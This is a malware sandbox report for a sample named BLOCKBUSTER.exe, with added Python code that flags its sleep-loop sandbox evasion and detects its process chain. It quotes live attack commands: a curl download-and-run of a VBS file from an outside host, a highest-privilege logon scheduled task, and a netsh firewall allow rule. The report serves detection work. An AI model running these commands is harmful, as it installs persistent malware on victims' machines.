Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Thread delayed: delay time: 1200000
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Thread delayed: delay time: 1200000
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Thread delayed: delay time: 1200000
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Window / User API: threadDelayed 1444
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe TID: 7144 Thread sleep time: -1200000s >= -30000s (7 identical entries)
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe TID: 7144 Thread sleep count: 1444 > 30
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe TID: 7144 Thread sleep time: -1732800000s >= -30000s
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe TID: 7144 Thread sleep time: -1200000s >= -30000s
Source: C:\Windows\SysWOW64\wscript.exe File Volume queried: C:\ FullSizeInformation
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Thread delayed: delay time: 1200000 (9 identical entries)
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Process information queried: ProcessInformation
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Memory allocated: page read and write | page guard
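Read together, the sleep observations above are what would defeat a time-boxed run. The report prints the raw relative interval handed to the sleep call, which is negative by the NtDelayExecution convention and, on the reading used here, in milliseconds: 1 200 000 ms is 20 minutes, which agrees with the unit-less "Thread delayed: delay time: 1200000" entries and with the "Contains long sleeps (>= 3 min)" signature in the summary. The two comparisons visible in the lines are the sandbox's thresholds (a single sleep of 30 000 ms or more; more than 30 sleeps on one thread), and 1444 × 1 200 000 = 1 732 800 000 is exactly the largest value reported for TID 7144, so that entry is the loop's cumulative sleep, roughly 20 days. The Python below is an added example, not part of the report or its analysis engine: it parses the copied lines, applies those two thresholds, and checks the cumulative sleep against an assumed analysis budget. The regexes, the millisecond reading and ANALYSIS_BUDGET_MS are the example's own assumptions.

```python
"""Sleep-loop evasion check over the report's 'Thread sleep' lines.

Added example, not part of the sandbox report. The input lines are copied from
the report; the regexes, the millisecond reading of the values, the two
thresholds (taken from the '>= -30000s' and '> 30' comparisons in those lines)
and ANALYSIS_BUDGET_MS are this example's assumptions.
"""
import re
from collections import defaultdict

# Constructed input: the distinct 'Thread sleep' lines reported for TID 7144.
REPORT_LINES = [
    r"Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe TID: 7144 Thread sleep time: -1200000s >= -30000s",
    r"Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe TID: 7144 Thread sleep count: 1444 > 30",
    r"Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe TID: 7144 Thread sleep time: -1732800000s >= -30000s",
]

SINGLE_SLEEP_MS = 30_000             # one sleep this long or longer is flagged
LOOP_COUNT = 30                      # more sleeps than this on one thread is flagged
ANALYSIS_BUDGET_MS = 10 * 60 * 1000  # assumed length of a sandbox run

SLEEP_RE = re.compile(r"Source: (?P<image>\S+) TID: (?P<tid>\d+) Thread sleep time: (?P<interval>-?\d+)s")
COUNT_RE = re.compile(r"Source: (?P<image>\S+) TID: (?P<tid>\d+) Thread sleep count: (?P<count>\d+)")


def parse_sleeps(lines):
    """Collect sleep intervals (as positive milliseconds) and the loop count per (image, tid)."""
    threads = defaultdict(lambda: {"intervals": [], "count": None})
    for line in lines:
        if m := SLEEP_RE.search(line):
            # The report prints the raw relative interval handed to NtDelayExecution,
            # which is negative by convention; negate it to get the magnitude.
            threads[(m["image"], m["tid"])]["intervals"].append(-int(m["interval"]))
        elif m := COUNT_RE.search(line):
            threads[(m["image"], m["tid"])]["count"] = int(m["count"])
    return threads


def assess(lines, budget_ms=ANALYSIS_BUDGET_MS):
    """One verdict per thread: per-call sleep, loop count, cumulative sleep and flags."""
    verdicts = {}
    for (image, tid), info in parse_sleeps(lines).items():
        if not info["intervals"]:
            continue
        per_call, largest, count = min(info["intervals"]), max(info["intervals"]), info["count"]
        total = count * per_call if count else largest
        flags = []
        if per_call >= SINGLE_SLEEP_MS:
            flags.append("long_sleep")
        if count is not None and count > LOOP_COUNT:
            flags.append("sleep_loop")
        if total > budget_ms:
            flags.append("outlasts_analysis")
        verdicts[tid] = {
            "image": image,
            "per_call_ms": per_call,
            "sleep_count": count,
            "total_ms": total,
            "total_days": round(total / 86_400_000, 1),
            # True when the largest reported value is exactly count x per-call sleep,
            # i.e. the sandbox also reported the loop's cumulative sleep.
            "reported_total_matches": count is not None and largest == count * per_call,
            "flags": flags,
        }
    return verdicts


if __name__ == "__main__":
    for tid, verdict in assess(REPORT_LINES).items():
        print(tid, verdict)
```

The practical consequence is that the schtasks and netsh activity listed further down can only have been observed because the analysis environment shortens or skips sleeps; a detonation that honours them would end with nothing beyond the VBS stage.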

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\wscript.exe Network Connect: 109.234.39.156 80
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720bdf2273b1.vbs https://acess.mailcffemx.com//6720bdf2272bc/6720bdf2273b1.vbs (2 identical entries)
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720bdf2273b1.vbs (4 identical entries)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -k -o C:\Users\Public\6720bdf2273b1.vbs https://acess.mailcffemx.com//6720bdf2272bc/6720bdf2273b1.vbs (2 identical entries)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720bdf2273b1.vbs" (4 identical entries)
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\_6720bdf2272bc\BLOCKBUSTER.exe "C:\_6720bdf2272bc\BLOCKBUSTER.exe"
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "BLOCKBUSTER"
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C SCHTASKS /Create /F /RL HIGHEST /TN "BLOCKBUSTER" /TR "C:\_6720bdf2272bc\BLOCKBUSTER.exe" /SC ONLOGON /DELAY 0001:00
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="BLOCKBUSTER" dir=in action=allow program="C:\_6720bdf2272bc\BLOCKBUSTER.exe" enable=yes profile=any
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /F /RL HIGHEST /TN "BLOCKBUSTER" /TR "C:\_6720bdf2272bc\BLOCKBUSTER.exe" /SC ONLOGON /DELAY 0001:00
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="BLOCKBUSTER" dir=in action=allow program="C:\_6720bdf2272bc\BLOCKBUSTER.exe" enable=yes profile=any
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe Queries volume information: C:\_6720bdf2272bc\downloaded.zip VolumeInformation (15 identical entries)
Source: C:\Windows\SysWOW64\wscript.exe Queries volume information: C:\ VolumeInformation (2 identical entries)
Source: C:\Windows\SysWOW64\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="BLOCKBUSTER" dir=in action=allow program="C:\_6720bdf2272bc\BLOCKBUSTER.exe" enable=yes profile=any
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="BLOCKBUSTER" dir=in action=allow program="C:\_6720bdf2272bc\BLOCKBUSTER.exe" enable=yes profile=any
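The two netsh entries above and the process creations in the preceding "HIPS / PFW / Operating System Protection Evasion" section together give the full chain: mshta.exe spawns cmd.exe, which fetches the VBS with curl -k (certificate verification disabled) into C:\Users\Public and starts it; wscript.exe then launches BLOCKBUSTER.exe from C:\_6720bdf2272bc\, and that executable tries to register itself as an ONLOGON task with /RL HIGHEST and to add an inbound allow rule for itself to the Windows firewall. Both of those last commands need an elevated token, so on a standard-user host the attempt is still logged even when it fails, and detection should key on the attempt rather than on success. The Python below is an added example, not part of the report: it reconstructs those creations as minimal Sysmon-style events (ParentImage, Image, CommandLine), runs six rules over them, and includes one constructed benign schtasks event that must not fire. The field names, rule names, TRUSTED_ROOTS list and the benign control are this example's assumptions; the ATT&CK technique IDs are the standard ones.

```python
"""Detection rules for the mshta -> cmd/curl -> wscript -> EXE -> schtasks/netsh chain.

Added example, not part of the sandbox report. Events are reconstructed from the
report's 'Process created' lines; field names, rule names, TRUSTED_ROOTS and the
benign control event are assumptions of this example.
"""
import re
from dataclasses import dataclass
from typing import Optional

# Assumed: program paths under these roots are treated as expected for a
# scheduled task or a firewall allow rule; anything else is suspicious.
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta", ".ps1", ".bat", ".cmd")
ATTACK = {  # ATT&CK technique per rule
    "mshta_curl_download": "T1218.005 / T1105",
    "curl_writes_script": "T1105",
    "script_from_public_dir": "T1059.005",
    "script_host_launches_untrusted_exe": "T1059.005",
    "schtasks_highest_untrusted_target": "T1053.005",
    "netsh_allow_untrusted_program": "T1562.004",
}


def _ev(parent, image, cmdline):
    return {"ParentImage": parent, "Image": image, "CommandLine": cmdline}


SYS = r"C:\Windows\SysWOW64"
# Constructed from the report's process-creation lines (one entry per distinct
# command), plus a benign control at the end that must not trigger any rule.
EVENTS = [
    _ev(SYS + r"\mshta.exe", SYS + r"\cmd.exe",
        r'"C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720bdf2273b1.vbs https://acess.mailcffemx.com//6720bdf2272bc/6720bdf2273b1.vbs'),
    _ev(SYS + r"\cmd.exe", SYS + r"\curl.exe",
        r"curl -k -o C:\Users\Public\6720bdf2273b1.vbs https://acess.mailcffemx.com//6720bdf2272bc/6720bdf2273b1.vbs"),
    _ev(SYS + r"\mshta.exe", SYS + r"\cmd.exe", r'"C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720bdf2273b1.vbs'),
    _ev(SYS + r"\cmd.exe", SYS + r"\wscript.exe", r'"C:\Windows\System32\WScript.exe" "C:\Users\Public\6720bdf2273b1.vbs"'),
    _ev(SYS + r"\wscript.exe", r"C:\_6720bdf2272bc\BLOCKBUSTER.exe", r'"C:\_6720bdf2272bc\BLOCKBUSTER.exe"'),
    _ev(SYS + r"\cmd.exe", SYS + r"\schtasks.exe",
        r'SCHTASKS /Create /F /RL HIGHEST /TN "BLOCKBUSTER" /TR "C:\_6720bdf2272bc\BLOCKBUSTER.exe" /SC ONLOGON /DELAY 0001:00'),
    _ev(SYS + r"\cmd.exe", SYS + r"\netsh.exe",
        r'netsh advfirewall firewall add rule name="BLOCKBUSTER" dir=in action=allow program="C:\_6720bdf2272bc\BLOCKBUSTER.exe" enable=yes profile=any'),
    _ev(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\schtasks.exe",  # constructed benign control
        r'SCHTASKS /Create /F /RL HIGHEST /TN "AcmeUpdater" /TR "C:\Program Files\Acme\updater.exe" /SC DAILY'),
]


@dataclass(frozen=True)
class Finding:
    rule: str
    technique: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _untrusted(path: str) -> bool:
    return not path.strip('"').lower().startswith(TRUSTED_ROOTS)


def _value_after(cmdline: str, flag: str) -> Optional[str]:
    """Value following a flag, quoted or bare: /TR "C:\\x.exe", -o C:\\y.vbs, program="C:\\z.exe"."""
    sep = "" if flag.endswith("=") else r"\s+"
    m = re.search(re.escape(flag) + sep + r'(?:"([^"]+)"|(\S+))', cmdline, re.IGNORECASE)
    return (m.group(1) or m.group(2)) if m else None


def detect(events):
    findings = []
    for ev in events:
        parent, image, cl = _basename(ev["ParentImage"]), _basename(ev["Image"]), ev["CommandLine"]
        low = cl.lower()
        hits = []
        # mshta.exe spawning a shell that fetches content with curl -k (TLS checks off)
        if parent == "mshta.exe" and image == "cmd.exe" and "curl" in low and re.search(r"\s-k\b", cl):
            hits.append("mshta_curl_download")
        # curl writing its download to a script file
        out = _value_after(cl, "-o") if image == "curl.exe" else None
        if out and out.lower().endswith(SCRIPT_EXTS):
            hits.append("curl_writes_script")
        # script host executing from the world-writable Public profile
        if image in ("wscript.exe", "cscript.exe") and "\\users\\public\\" in low:
            hits.append("script_from_public_dir")
        # script host launching a PE from outside the trusted roots
        if parent in ("wscript.exe", "cscript.exe") and image.endswith(".exe") and _untrusted(ev["Image"]):
            hits.append("script_host_launches_untrusted_exe")
        # schtasks /Create with /RL HIGHEST whose /TR points outside the trusted roots
        if image == "schtasks.exe" and "/create" in low and "/rl highest" in low:
            target = _value_after(cl, "/TR")
            if target and _untrusted(target):
                hits.append("schtasks_highest_untrusted_target")
        # netsh adding an inbound allow rule for a program outside the trusted roots
        if image == "netsh.exe" and "advfirewall firewall add rule" in low and "action=allow" in low:
            prog = _value_after(cl, "program=")
            if prog and _untrusted(prog):
                hits.append("netsh_allow_untrusted_program")
        findings.extend(Finding(r, ATTACK[r], ev["Image"], cl) for r in hits)
    return findings


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f"{f.technique:<18} {f.rule:<36} {f.command_line}")
```

Each rule fires on a single event, so none of them needs parent-child correlation beyond what Sysmon Event ID 1 already carries; the chain as a whole is recovered by ordering the findings by time. The TRUSTED_ROOTS allow-list is deliberately narrow: a root-level directory with a hex name such as C:\_6720bdf2272bc\ is the kind of path that a path-based rule catches and a hash-based one does not.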